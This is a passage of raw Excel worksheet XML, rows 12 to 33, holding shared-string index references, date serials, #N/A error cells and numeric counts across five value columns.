      <c r="A12" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B12" s="51">
        <v>44706.679878750001</v>
      </c>
      <c r="C12" s="1" t="s">
        <v>152</v>
      </c>
      <c r="D12" s="26">
        <v>100</v>
      </c>
      <c r="E12" s="1" t="s">
        <v>153</v>
      </c>
      <c r="F12" s="26">
        <v>100</v>
      </c>
      <c r="G12" s="57" t="s">
        <v>154</v>
      </c>
      <c r="H12" s="1" t="s">
        <v>155</v>
      </c>
      <c r="I12" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J12" s="1" t="s">
        <v>157</v>
      </c>
      <c r="K12" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L12" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M12" s="1" t="s">
        <v>158</v>
      </c>
      <c r="N12" s="1" t="s">
        <v>159</v>
      </c>
      <c r="O12" s="1" t="s">
        <v>160</v>
      </c>
      <c r="P12" s="1"/>
      <c r="Q12" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R12" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S12" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T12" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U12" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V12" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W12" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="13" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A13" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B13" s="51">
        <v>44396.621348773151</v>
      </c>
      <c r="C13" s="1" t="s">
        <v>199</v>
      </c>
      <c r="D13" s="43">
        <v>101</v>
      </c>
      <c r="E13" s="1" t="s">
        <v>200</v>
      </c>
      <c r="F13" s="26">
        <v>101</v>
      </c>
      <c r="G13" s="1" t="s">
        <v>201</v>
      </c>
      <c r="H13" s="1" t="s">
        <v>202</v>
      </c>
      <c r="I13" s="1" t="s">
        <v>203</v>
      </c>
      <c r="J13" s="1" t="s">
        <v>204</v>
      </c>
      <c r="K13" s="1" t="s">
        <v>16</v>
      </c>
      <c r="L13" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M13" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N13" s="1"/>
      <c r="O13" s="1"/>
      <c r="P13" s="1"/>
      <c r="Q13" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R13" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S13" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T13" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U13" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V13" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W13" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="14" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A14" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B14" s="51">
        <v>44622.64242405093</v>
      </c>
      <c r="C14" s="1" t="s">
        <v>333</v>
      </c>
      <c r="D14" s="43">
        <v>100</v>
      </c>
      <c r="E14" s="1" t="s">
        <v>334</v>
      </c>
      <c r="F14" s="26">
        <v>100</v>
      </c>
      <c r="G14" s="57" t="s">
        <v>335</v>
      </c>
      <c r="H14" s="1" t="s">
        <v>336</v>
      </c>
      <c r="I14" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J14" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K14" s="1" t="s">
        <v>15</v>
      </c>
      <c r="L14" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M14" s="1" t="s">
        <v>90</v>
      </c>
      <c r="N14" s="1" t="s">
        <v>91</v>
      </c>
      <c r="O14" s="1"/>
      <c r="P14" s="1"/>
      <c r="Q14" s="1" t="s">
        <v>3494</v>
      </c>
      <c r="R14" s="83">
        <v>50</v>
      </c>
      <c r="S14" s="83">
        <v>36796</v>
      </c>
      <c r="T14" s="83">
        <v>35561</v>
      </c>
      <c r="U14" s="83">
        <v>27151</v>
      </c>
      <c r="V14" s="83">
        <v>46125</v>
      </c>
      <c r="W14" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="15" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A15" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B15" s="51">
        <v>44722.466576481478</v>
      </c>
      <c r="C15" s="1" t="s">
        <v>333</v>
      </c>
      <c r="D15" s="26">
        <v>100</v>
      </c>
      <c r="E15" s="1" t="s">
        <v>338</v>
      </c>
      <c r="F15" s="26">
        <v>100</v>
      </c>
      <c r="G15" s="57" t="s">
        <v>339</v>
      </c>
      <c r="H15" s="1" t="s">
        <v>340</v>
      </c>
      <c r="I15" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J15" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K15" s="1" t="s">
        <v>15</v>
      </c>
      <c r="L15" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M15" s="1" t="s">
        <v>90</v>
      </c>
      <c r="N15" s="1" t="s">
        <v>91</v>
      </c>
      <c r="O15" s="1" t="s">
        <v>341</v>
      </c>
      <c r="P15" s="1"/>
      <c r="Q15" s="1" t="s">
        <v>3494</v>
      </c>
      <c r="R15" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S15" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T15" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U15" s="83">
        <v>17</v>
      </c>
      <c r="V15" s="83">
        <v>6</v>
      </c>
      <c r="W15" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="16" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A16" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B16" s="51">
        <v>44447.490985370372</v>
      </c>
      <c r="C16" s="1" t="s">
        <v>342</v>
      </c>
      <c r="D16" s="43">
        <v>160</v>
      </c>
      <c r="E16" s="1" t="s">
        <v>343</v>
      </c>
      <c r="F16" s="26">
        <v>120</v>
      </c>
      <c r="G16" s="1" t="s">
        <v>344</v>
      </c>
      <c r="H16" s="1" t="s">
        <v>345</v>
      </c>
      <c r="I16" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J16" s="1" t="s">
        <v>236</v>
      </c>
      <c r="K16" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L16" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M16" s="1" t="s">
        <v>237</v>
      </c>
      <c r="N16" s="1" t="s">
        <v>238</v>
      </c>
      <c r="O16" s="1"/>
      <c r="P16" s="1"/>
      <c r="Q16" s="1" t="s">
        <v>3495</v>
      </c>
      <c r="R16" s="83">
        <v>1803</v>
      </c>
      <c r="S16" s="83">
        <v>2137</v>
      </c>
      <c r="T16" s="83">
        <v>2203</v>
      </c>
      <c r="U16" s="83">
        <v>1251</v>
      </c>
      <c r="V16" s="83">
        <v>165</v>
      </c>
      <c r="W16" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="17" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A17" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B17" s="51">
        <v>44511.693646087966</v>
      </c>
      <c r="C17" s="1" t="s">
        <v>342</v>
      </c>
      <c r="D17" s="26">
        <v>160</v>
      </c>
      <c r="E17" s="1" t="s">
        <v>347</v>
      </c>
      <c r="F17" s="26">
        <v>100</v>
      </c>
      <c r="G17" s="1" t="s">
        <v>348</v>
      </c>
      <c r="H17" s="1" t="s">
        <v>349</v>
      </c>
      <c r="I17" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J17" s="1" t="s">
        <v>236</v>
      </c>
      <c r="K17" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L17" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M17" s="1" t="s">
        <v>237</v>
      </c>
      <c r="N17" s="1" t="s">
        <v>238</v>
      </c>
      <c r="O17" s="1" t="s">
        <v>350</v>
      </c>
      <c r="P17" s="1"/>
      <c r="Q17" s="1" t="s">
        <v>3495</v>
      </c>
      <c r="R17" s="83">
        <v>109</v>
      </c>
      <c r="S17" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T17" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U17" s="83">
        <v>10</v>
      </c>
      <c r="V17" s="83">
        <v>21</v>
      </c>
      <c r="W17" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="18" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A18" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B18" s="51">
        <v>44503.827030671295</v>
      </c>
      <c r="C18" s="1" t="s">
        <v>342</v>
      </c>
      <c r="D18" s="43">
        <v>160</v>
      </c>
      <c r="E18" s="1" t="s">
        <v>351</v>
      </c>
      <c r="F18" s="26">
        <v>110</v>
      </c>
      <c r="G18" s="1" t="s">
        <v>352</v>
      </c>
      <c r="H18" s="1" t="s">
        <v>353</v>
      </c>
      <c r="I18" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J18" s="1" t="s">
        <v>236</v>
      </c>
      <c r="K18" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L18" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M18" s="1" t="s">
        <v>237</v>
      </c>
      <c r="N18" s="1" t="s">
        <v>238</v>
      </c>
      <c r="O18" s="1"/>
      <c r="P18" s="1"/>
      <c r="Q18" s="1" t="s">
        <v>3495</v>
      </c>
      <c r="R18" s="83">
        <v>2</v>
      </c>
      <c r="S18" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T18" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U18" s="83">
        <v>24</v>
      </c>
      <c r="V18" s="83">
        <v>2</v>
      </c>
      <c r="W18" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="19" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A19" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B19" s="51">
        <v>44503.827030682871</v>
      </c>
      <c r="C19" s="1" t="s">
        <v>342</v>
      </c>
      <c r="D19" s="43">
        <v>160</v>
      </c>
      <c r="E19" s="1" t="s">
        <v>354</v>
      </c>
      <c r="F19" s="26">
        <v>101</v>
      </c>
      <c r="G19" s="1" t="s">
        <v>355</v>
      </c>
      <c r="H19" s="1" t="s">
        <v>356</v>
      </c>
      <c r="I19" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J19" s="1" t="s">
        <v>236</v>
      </c>
      <c r="K19" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L19" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M19" s="1" t="s">
        <v>237</v>
      </c>
      <c r="N19" s="1" t="s">
        <v>238</v>
      </c>
      <c r="O19" s="1"/>
      <c r="P19" s="1"/>
      <c r="Q19" s="1" t="s">
        <v>3495</v>
      </c>
      <c r="R19" s="83">
        <v>225</v>
      </c>
      <c r="S19" s="83">
        <v>474</v>
      </c>
      <c r="T19" s="83">
        <v>387</v>
      </c>
      <c r="U19" s="83">
        <v>253</v>
      </c>
      <c r="V19" s="83">
        <v>236</v>
      </c>
      <c r="W19" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="20" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A20" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B20" s="51">
        <v>44161.580590034719</v>
      </c>
      <c r="C20" s="1" t="s">
        <v>357</v>
      </c>
      <c r="D20" s="43">
        <v>100</v>
      </c>
      <c r="E20" s="1" t="s">
        <v>358</v>
      </c>
      <c r="F20" s="26">
        <v>100</v>
      </c>
      <c r="G20" s="1" t="s">
        <v>359</v>
      </c>
      <c r="H20" s="1" t="s">
        <v>360</v>
      </c>
      <c r="I20" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J20" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K20" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L20" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M20" s="1" t="s">
        <v>237</v>
      </c>
      <c r="N20" s="1" t="s">
        <v>238</v>
      </c>
      <c r="O20" s="1" t="s">
        <v>361</v>
      </c>
      <c r="P20" s="1"/>
      <c r="Q20" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R20" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S20" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T20" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U20" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V20" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W20" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="21" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A21" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B21" s="51">
        <v>43971.455569467595</v>
      </c>
      <c r="C21" s="1" t="s">
        <v>362</v>
      </c>
      <c r="D21" s="43">
        <v>100</v>
      </c>
      <c r="E21" s="1" t="s">
        <v>363</v>
      </c>
      <c r="F21" s="26">
        <v>100</v>
      </c>
      <c r="G21" s="1" t="s">
        <v>364</v>
      </c>
      <c r="H21" s="1" t="s">
        <v>365</v>
      </c>
      <c r="I21" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J21" s="1" t="s">
        <v>236</v>
      </c>
      <c r="K21" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L21" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M21" s="1" t="s">
        <v>237</v>
      </c>
      <c r="N21" s="1" t="s">
        <v>238</v>
      </c>
      <c r="O21" s="1" t="s">
        <v>111</v>
      </c>
      <c r="P21" s="1"/>
      <c r="Q21" s="1" t="s">
        <v>3496</v>
      </c>
      <c r="R21" s="83">
        <v>363508</v>
      </c>
      <c r="S21" s="83">
        <v>451080</v>
      </c>
      <c r="T21" s="83">
        <v>548944</v>
      </c>
      <c r="U21" s="83">
        <v>268199</v>
      </c>
      <c r="V21" s="83">
        <v>301837</v>
      </c>
      <c r="W21" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="22" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A22" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B22" s="51">
        <v>44405.482558391202</v>
      </c>
      <c r="C22" s="1" t="s">
        <v>367</v>
      </c>
      <c r="D22" s="43">
        <v>111</v>
      </c>
      <c r="E22" s="1" t="s">
        <v>368</v>
      </c>
      <c r="F22" s="26">
        <v>100</v>
      </c>
      <c r="G22" s="1" t="s">
        <v>369</v>
      </c>
      <c r="H22" s="1" t="s">
        <v>370</v>
      </c>
      <c r="I22" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J22" s="1" t="s">
        <v>236</v>
      </c>
      <c r="K22" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L22" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M22" s="1" t="s">
        <v>236</v>
      </c>
      <c r="N22" s="1"/>
      <c r="O22" s="1" t="s">
        <v>371</v>
      </c>
      <c r="P22" s="1"/>
      <c r="Q22" s="1" t="s">
        <v>3497</v>
      </c>
      <c r="R22" s="83">
        <v>15090</v>
      </c>
      <c r="S22" s="83">
        <v>13819</v>
      </c>
      <c r="T22" s="83">
        <v>12767</v>
      </c>
      <c r="U22" s="83">
        <v>13183</v>
      </c>
      <c r="V22" s="83">
        <v>13692</v>
      </c>
      <c r="W22" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="23" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A23" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B23" s="51">
        <v>44510.617340069446</v>
      </c>
      <c r="C23" s="1" t="s">
        <v>367</v>
      </c>
      <c r="D23" s="43">
        <v>111</v>
      </c>
      <c r="E23" s="1" t="s">
        <v>373</v>
      </c>
      <c r="F23" s="26">
        <v>101</v>
      </c>
      <c r="G23" s="1" t="s">
        <v>374</v>
      </c>
      <c r="H23" s="1" t="s">
        <v>375</v>
      </c>
      <c r="I23" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J23" s="1" t="s">
        <v>236</v>
      </c>
      <c r="K23" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L23" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M23" s="1" t="s">
        <v>236</v>
      </c>
      <c r="N23" s="1"/>
      <c r="O23" s="1"/>
      <c r="P23" s="1"/>
      <c r="Q23" s="1" t="s">
        <v>3497</v>
      </c>
      <c r="R23" s="83">
        <v>1246</v>
      </c>
      <c r="S23" s="83">
        <v>3347</v>
      </c>
      <c r="T23" s="83">
        <v>6518</v>
      </c>
      <c r="U23" s="83">
        <v>5956</v>
      </c>
      <c r="V23" s="83">
        <v>10336</v>
      </c>
      <c r="W23" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="24" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A24" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B24" s="51">
        <v>44579.824702824073</v>
      </c>
      <c r="C24" s="1" t="s">
        <v>376</v>
      </c>
      <c r="D24" s="43">
        <v>132</v>
      </c>
      <c r="E24" s="1" t="s">
        <v>377</v>
      </c>
      <c r="F24" s="26">
        <v>102</v>
      </c>
      <c r="G24" s="1" t="s">
        <v>378</v>
      </c>
      <c r="H24" s="1" t="s">
        <v>379</v>
      </c>
      <c r="I24" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J24" s="1" t="s">
        <v>236</v>
      </c>
      <c r="K24" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L24" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M24" s="1" t="s">
        <v>236</v>
      </c>
      <c r="N24" s="1"/>
      <c r="O24" s="1" t="s">
        <v>380</v>
      </c>
      <c r="P24" s="1"/>
      <c r="Q24" s="1" t="s">
        <v>3498</v>
      </c>
      <c r="R24" s="83">
        <v>3</v>
      </c>
      <c r="S24" s="83">
        <v>12</v>
      </c>
      <c r="T24" s="83">
        <v>57</v>
      </c>
      <c r="U24" s="83">
        <v>41</v>
      </c>
      <c r="V24" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W24" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="25" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A25" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B25" s="51">
        <v>44494.933607407409</v>
      </c>
      <c r="C25" s="1" t="s">
        <v>376</v>
      </c>
      <c r="D25" s="43">
        <v>132</v>
      </c>
      <c r="E25" s="1" t="s">
        <v>382</v>
      </c>
      <c r="F25" s="26">
        <v>120</v>
      </c>
      <c r="G25" s="1" t="s">
        <v>383</v>
      </c>
      <c r="H25" s="1" t="s">
        <v>384</v>
      </c>
      <c r="I25" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J25" s="1" t="s">
        <v>236</v>
      </c>
      <c r="K25" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L25" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M25" s="1" t="s">
        <v>236</v>
      </c>
      <c r="N25" s="1"/>
      <c r="O25" s="1" t="s">
        <v>385</v>
      </c>
      <c r="P25" s="1"/>
      <c r="Q25" s="1" t="s">
        <v>3498</v>
      </c>
      <c r="R25" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S25" s="83">
        <v>1</v>
      </c>
      <c r="T25" s="83">
        <v>1</v>
      </c>
      <c r="U25" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V25" s="83">
        <v>2</v>
      </c>
      <c r="W25" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="26" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A26" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B26" s="51">
        <v>44405.538274456019</v>
      </c>
      <c r="C26" s="1" t="s">
        <v>376</v>
      </c>
      <c r="D26" s="43">
        <v>132</v>
      </c>
      <c r="E26" s="1" t="s">
        <v>386</v>
      </c>
      <c r="F26" s="26">
        <v>120</v>
      </c>
      <c r="G26" s="1" t="s">
        <v>387</v>
      </c>
      <c r="H26" s="1" t="s">
        <v>388</v>
      </c>
      <c r="I26" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J26" s="1" t="s">
        <v>236</v>
      </c>
      <c r="K26" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L26" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M26" s="1" t="s">
        <v>236</v>
      </c>
      <c r="N26" s="1"/>
      <c r="O26" s="1" t="s">
        <v>389</v>
      </c>
      <c r="P26" s="1"/>
      <c r="Q26" s="1" t="s">
        <v>3498</v>
      </c>
      <c r="R26" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S26" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T26" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U26" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V26" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W26" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="27" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A27" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B27" s="51">
        <v>44336.619851631942</v>
      </c>
      <c r="C27" s="1" t="s">
        <v>397</v>
      </c>
      <c r="D27" s="43">
        <v>100</v>
      </c>
      <c r="E27" s="1" t="s">
        <v>398</v>
      </c>
      <c r="F27" s="26">
        <v>100</v>
      </c>
      <c r="G27" s="1" t="s">
        <v>399</v>
      </c>
      <c r="H27" s="1" t="s">
        <v>400</v>
      </c>
      <c r="I27" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J27" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K27" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L27" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M27" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N27" s="1" t="s">
        <v>174</v>
      </c>
      <c r="O27" s="1"/>
      <c r="P27" s="1"/>
      <c r="Q27" s="1" t="s">
        <v>401</v>
      </c>
      <c r="R27" s="83">
        <v>106853</v>
      </c>
      <c r="S27" s="83">
        <v>142489</v>
      </c>
      <c r="T27" s="83">
        <v>192460</v>
      </c>
      <c r="U27" s="83">
        <v>201563</v>
      </c>
      <c r="V27" s="83">
        <v>202867</v>
      </c>
      <c r="W27" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="28" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A28" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B28" s="51">
        <v>44415.434837361114</v>
      </c>
      <c r="C28" s="1" t="s">
        <v>402</v>
      </c>
      <c r="D28" s="43">
        <v>101</v>
      </c>
      <c r="E28" s="1" t="s">
        <v>403</v>
      </c>
      <c r="F28" s="26">
        <v>101</v>
      </c>
      <c r="G28" s="1" t="s">
        <v>404</v>
      </c>
      <c r="H28" s="1" t="s">
        <v>405</v>
      </c>
      <c r="I28" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J28" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K28" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L28" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M28" s="1" t="s">
        <v>406</v>
      </c>
      <c r="N28" s="1" t="s">
        <v>407</v>
      </c>
      <c r="O28" s="1"/>
      <c r="P28" s="1"/>
      <c r="Q28" s="1" t="s">
        <v>3499</v>
      </c>
      <c r="R28" s="83">
        <v>26999459</v>
      </c>
      <c r="S28" s="83">
        <v>87794372</v>
      </c>
      <c r="T28" s="83">
        <v>87155684</v>
      </c>
      <c r="U28" s="83">
        <v>88695635</v>
      </c>
      <c r="V28" s="83">
        <v>103033730</v>
      </c>
      <c r="W28" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="29" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A29" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B29" s="51">
        <v>44473.722917141204</v>
      </c>
      <c r="C29" s="1" t="s">
        <v>409</v>
      </c>
      <c r="D29" s="43">
        <v>111</v>
      </c>
      <c r="E29" s="1" t="s">
        <v>410</v>
      </c>
      <c r="F29" s="26">
        <v>102</v>
      </c>
      <c r="G29" s="1" t="s">
        <v>411</v>
      </c>
      <c r="H29" s="1" t="s">
        <v>412</v>
      </c>
      <c r="I29" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J29" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K29" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L29" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M29" s="1" t="s">
        <v>406</v>
      </c>
      <c r="N29" s="1" t="s">
        <v>407</v>
      </c>
      <c r="O29" s="1"/>
      <c r="P29" s="1"/>
      <c r="Q29" s="1" t="s">
        <v>3500</v>
      </c>
      <c r="R29" s="83">
        <v>14794</v>
      </c>
      <c r="S29" s="83">
        <v>14917</v>
      </c>
      <c r="T29" s="83">
        <v>9655</v>
      </c>
      <c r="U29" s="83">
        <v>9689</v>
      </c>
      <c r="V29" s="83">
        <v>18352</v>
      </c>
      <c r="W29" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="30" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A30" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B30" s="51">
        <v>44473.722917106483</v>
      </c>
      <c r="C30" s="1" t="s">
        <v>409</v>
      </c>
      <c r="D30" s="43">
        <v>111</v>
      </c>
      <c r="E30" s="1" t="s">
        <v>414</v>
      </c>
      <c r="F30" s="26">
        <v>102</v>
      </c>
      <c r="G30" s="1" t="s">
        <v>415</v>
      </c>
      <c r="H30" s="1" t="s">
        <v>416</v>
      </c>
      <c r="I30" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J30" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K30" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L30" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M30" s="1" t="s">
        <v>406</v>
      </c>
      <c r="N30" s="1" t="s">
        <v>407</v>
      </c>
      <c r="O30" s="1"/>
      <c r="P30" s="1"/>
      <c r="Q30" s="1" t="s">
        <v>3500</v>
      </c>
      <c r="R30" s="83">
        <v>11994</v>
      </c>
      <c r="S30" s="83">
        <v>11289</v>
      </c>
      <c r="T30" s="83">
        <v>9665</v>
      </c>
      <c r="U30" s="83">
        <v>8328</v>
      </c>
      <c r="V30" s="83">
        <v>12524</v>
      </c>
      <c r="W30" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="31" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A31" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B31" s="51">
        <v>44473.722917129628</v>
      </c>
      <c r="C31" s="1" t="s">
        <v>409</v>
      </c>
      <c r="D31" s="43">
        <v>111</v>
      </c>
      <c r="E31" s="1" t="s">
        <v>417</v>
      </c>
      <c r="F31" s="26">
        <v>111</v>
      </c>
      <c r="G31" s="1" t="s">
        <v>418</v>
      </c>
      <c r="H31" s="1" t="s">
        <v>419</v>
      </c>
      <c r="I31" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J31" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K31" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L31" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M31" s="1" t="s">
        <v>406</v>
      </c>
      <c r="N31" s="1" t="s">
        <v>407</v>
      </c>
      <c r="O31" s="1"/>
      <c r="P31" s="1"/>
      <c r="Q31" s="1" t="s">
        <v>3500</v>
      </c>
      <c r="R31" s="83">
        <v>11922</v>
      </c>
      <c r="S31" s="83">
        <v>11141</v>
      </c>
      <c r="T31" s="83">
        <v>9679</v>
      </c>
      <c r="U31" s="83">
        <v>8338</v>
      </c>
      <c r="V31" s="83">
        <v>12483</v>
      </c>
      <c r="W31" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="32" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A32" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B32" s="51">
        <v>44415.434837349538</v>
      </c>
      <c r="C32" s="1" t="s">
        <v>402</v>
      </c>
      <c r="D32" s="43">
        <v>101</v>
      </c>
      <c r="E32" s="1" t="s">
        <v>420</v>
      </c>
      <c r="F32" s="26">
        <v>101</v>
      </c>
      <c r="G32" s="1" t="s">
        <v>421</v>
      </c>
      <c r="H32" s="1" t="s">
        <v>422</v>
      </c>
      <c r="I32" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J32" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K32" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L32" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M32" s="1" t="s">
        <v>406</v>
      </c>
      <c r="N32" s="1" t="s">
        <v>407</v>
      </c>
      <c r="O32" s="1"/>
      <c r="P32" s="1"/>
      <c r="Q32" s="1" t="s">
        <v>3499</v>
      </c>
      <c r="R32" s="83">
        <v>5947313</v>
      </c>
      <c r="S32" s="83">
        <v>8781649</v>
      </c>
      <c r="T32" s="83">
        <v>12202895</v>
      </c>
      <c r="U32" s="83">
        <v>13129075</v>
      </c>
      <c r="V32" s="83">
        <v>14781955</v>
      </c>
      <c r="W32" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="33" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A33" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B33" s="51">
        <v>44415.434867129632</v>
      </c>
      <c r="C33" s="1" t="s">
        <v>423</v>
      </c>
      <c r="D33" s="43">
        <v>101</v>
      </c>
      <c r="E33" s="1" t="s">
        <v>424</v>
